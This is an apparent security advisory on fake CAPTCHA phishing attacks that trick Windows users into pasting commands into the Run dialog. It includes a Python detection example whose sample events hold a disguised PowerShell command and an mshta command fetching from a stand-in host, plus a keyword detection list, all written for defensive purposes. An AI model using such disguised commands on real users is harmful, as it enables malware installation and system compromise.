Threat Feed advisory (severity: high)

Potential Fake CAPTCHA Phishing Attack via Command Line

This rule detects potential fake CAPTCHA phishing attacks on Windows systems where victims are tricked into copying and pasting malicious commands into the Windows Run dialog box.

This detection identifies potential fake CAPTCHA phishing attacks targeting Windows users. The attack relies on compromised websites with browser injects that display fake CAPTCHAs or fake error messages. The user is then instructed to copy and paste a malicious command into the Windows Run dialog box, which executes via PowerShell, Cmd, or Mshta. This technique deceives users into running arbitrary code disguised as a legitimate verification or fix, potentially leading to malware installation or system compromise. The rule focuses on identifying suspicious command-line activity that originates from explorer.exe and contains CAPTCHA-related keywords, indicating a high likelihood of a phishing attempt. This activity started being tracked around August 2025 and continues to be a relevant threat.

Attack Chain

  1. User visits a compromised website displaying a fake CAPTCHA or error message.
  2. The website instructs the user to copy a command containing CAPTCHA-related keywords.
  3. The user pastes the command into the Windows Run dialog box.
  4. Explorer.exe launches one of PowerShell, cmd.exe, or mshta.exe.
  5. The launched process executes the malicious command.
  6. The malicious command may download and execute further payloads or scripts.
  7. These payloads can lead to malware installation or system compromise.
  8. The attacker gains unauthorized access or control over the system.
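To show how the detection described above (explorer.exe as parent, PowerShell/cmd/mshta as child, CAPTCHA-related keywords in the command line) can be checked against process-creation telemetry, here is an added Python example; it is not part of this advisory or the vendor's Sigma rules, and the field names, keyword list and sample events are constructed assumptions.

```python
import re

# Constructed Sysmon Event ID 1 (process creation) style records for illustration.
# Field names follow Sysmon's ParentImage / Image / CommandLine; the events are not real telemetry.
SAMPLE_EVENTS = [
    {   # Run-dialog launch with a fake "verification" comment appended: should alert
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "Write-Output ok" # I am not a robot - reCAPTCHA Verification ID: 7731',
    },
    {   # mshta spawned from explorer.exe with a CAPTCHA keyword: should alert
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": 'mshta "http://example.invalid/verify" # Captcha verification',
    },
    {   # Legitimate admin script from the Run dialog, no keyword: must not alert
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -NoProfile -File C:\Scripts\backup.ps1",
    },
    {   # Keyword present but parent is a browser, not explorer.exe: must not alert
        "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd /c echo captcha",
    },
]

# Child processes the advisory names as launch targets (pwsh.exe added as an assumption).
CHILD_IMAGES = ("\\powershell.exe", "\\pwsh.exe", "\\cmd.exe", "\\mshta.exe")

# Illustrative CAPTCHA-related keywords; a production rule would tune this list.
KEYWORDS = re.compile(
    r"captcha|i am not a robot|verification id|verify you are human|ray id", re.IGNORECASE
)


def is_fake_captcha_execution(event):
    """Return True when the event matches all three conditions of the detection."""
    parent_ok = event.get("ParentImage", "").lower().endswith("\\explorer.exe")
    child_ok = event.get("Image", "").lower().endswith(CHILD_IMAGES)
    keyword_ok = KEYWORDS.search(event.get("CommandLine", "")) is not None
    return parent_ok and child_ok and keyword_ok


def triage(events):
    """Return the subset of events an analyst should review, per the advisory's guidance."""
    return [e for e in events if is_fake_captcha_execution(e)]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print("ALERT:", hit["Image"], "|", hit["CommandLine"])
```

Alerts from this logic still need the parent-process and network-connection review the advisory recommends, since the keyword match alone does not prove malicious intent.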

Impact

Successful execution of these attacks can lead to system compromise, data theft, or malware installation. Victims are tricked into running malicious commands, bypassing traditional security measures. The impact ranges from individual system infections to potential network-wide breaches if the initial foothold is used for lateral movement. A successful attack could result in significant data loss, financial damages, and reputational harm.

Recommendation

  • Deploy the Sigma rule “Potential Fake CAPTCHA Phishing Attack via PowerShell” to your SIEM to detect suspicious command-line activity related to fake CAPTCHAs.
  • Deploy the Sigma rule “Potential Fake CAPTCHA Phishing Attack via Mshta” to your SIEM to detect suspicious command-line activity related to fake CAPTCHAs.
  • Investigate any alerts generated by these rules by examining the command line arguments, parent processes, and network connections.
  • Enable Sysmon process creation logging to provide detailed information about process executions.
  • Implement user awareness training to educate users about the dangers of copying and pasting commands from untrusted websites.

Detection coverage (2 rules)

Potential Fake CAPTCHA Phishing Attack via PowerShell

Severity: high

Detects potential fake CAPTCHA phishing attacks based on PowerShell command-line values originating from explorer.exe.

Format: Sigma. Tactics: Execution. Techniques: T1204.002. Sources: process_creation, windows.

Potential Fake CAPTCHA Phishing Attack via Mshta

Severity: high

Detects potential fake CAPTCHA phishing attacks based on mshta.exe command-line values originating from explorer.exe.

Format: Sigma. Tactics: Execution. Techniques: T1218.005. Sources: process_creation, windows.
